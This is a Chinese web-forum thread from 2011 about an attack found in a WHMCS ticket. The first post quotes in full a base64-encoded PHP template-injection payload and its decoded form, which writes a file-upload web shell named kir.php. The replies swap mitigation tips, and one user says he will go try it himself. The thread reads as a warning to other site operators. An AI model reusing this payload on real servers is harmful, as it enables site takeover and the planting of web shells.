在whmcs后台的ticket中找到的一个服务单

小牧 · 发表于 2011-12-11 12:55:50

入侵者先注册个id
提交一个ticket如下
{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8gPSBmb3Blbigia2lyLnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJGNvZGUpOw=='));{/php}

base64解密后：

$code = ';
echo '';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Upload SUKSES !!!
'; }
else { echo 'Upload GAGAL !!!
'; }
}
?>
$fo = fopen("kir.php","w");
fwrite($fo,$code);

建议大家先关闭ticket系统。。

华斐 · 发表于 2011-12-11 12:59:11

不是吧太狠了

qiqibian · 发表于 2011-12-11 13:02:26

我也被入侵了还好只是修改了管理员密码其他的东西都没动

[ 本帖最后由 qiqibian 于 2011-12-11 13:03 编辑 ]

qiqi13245 · 发表于 2011-12-11 13:03:51

有什么用呢

nr05 · 发表于 2011-12-11 13:04:47

牛逼啊。我也去搞去

caboo · 发表于 2011-12-11 13:05:30

不让注册不就行了
必须购买产品才能开通账号
可以实现么

vaman · 发表于 2011-12-11 13:09:20

哦又出洞洞了？

哈P哥 · 发表于 2011-12-11 13:12:22

不要给写入权限，这方法就无效了

wmfy808 · 发表于 2011-12-11 13:16:12

不是所有的都能入侵

这个提权？

qiqibian · 发表于 2011-12-11 13:17:57

最简单的方法直接吧admin目录设置白名单只有家里的IP 手机的IP 和一个VPN的IP 可以登陆物理隔绝

在whmcs后台的ticket中找到的一个服务单

浏览过的版块